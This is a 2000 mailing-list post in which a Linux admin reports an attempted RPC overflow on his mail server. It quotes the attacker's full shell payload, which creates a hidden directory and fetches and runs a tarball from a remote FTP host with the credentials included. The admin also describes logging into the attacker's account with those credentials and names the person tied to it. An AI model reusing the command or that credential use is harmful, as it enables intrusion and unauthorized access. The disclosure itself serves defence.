Security Incidents mailing list archives
Crack attempt last weekend
From: Nick Ruisi <n_ruisi () SOFTHOME NET>
Date: Sun, 26 Nov 2000 07:27:52 -0500
Last weekend someone made an attempt at my Red Hat Linux mail server. I am sharing this with you all so you can protect yourself against it. While looking through my /var/log/messages file, I noticed a line from in.rpcd (don't ask why I haven't disabled it - I hadn't realised it was running). It appears someone was 1) Spoofing themselves as "localhost" and 2) Attempting to overflow the rpc buffer. At the end of the "overflow string" were the following commands /bin/sh;mkdir /usr/man/man5/.sart;cd /usr/man/man5/.sart;ncftpget -u agg0 -p sei 209.202.197.152 . c.tar.gz;tar xzvf c.tar.gz;./i Yes, I have posted this individual's FTP username and password. They left it in my logfile. Using that information, I was able to determine that Lycos owns the netblock of the FTP server (its a tripod homepages host). So I logged onto tripod with that username and password and was able to determine that someone created the account for an identity named Cara Freda (freda () emd2 org). The emd2.org domain appears to be all about hacking and cracking/warez. Be careful out there! - Nick Ruisi Linux Admin P.S. I have already notified all service providers involved (Lycos, NameZero, Tripod, Anglefire) and they have not responded to me.
Current thread:
- Crack attempt last weekend Nick Ruisi (Nov 28)
- Re: Crack attempt last weekend Bryan Smith (Nov 29)
- Re: Crack attempt last weekend Clayton Hoskinson (Nov 30)
- Re: Crack attempt last weekend Bryan Smith (Nov 29)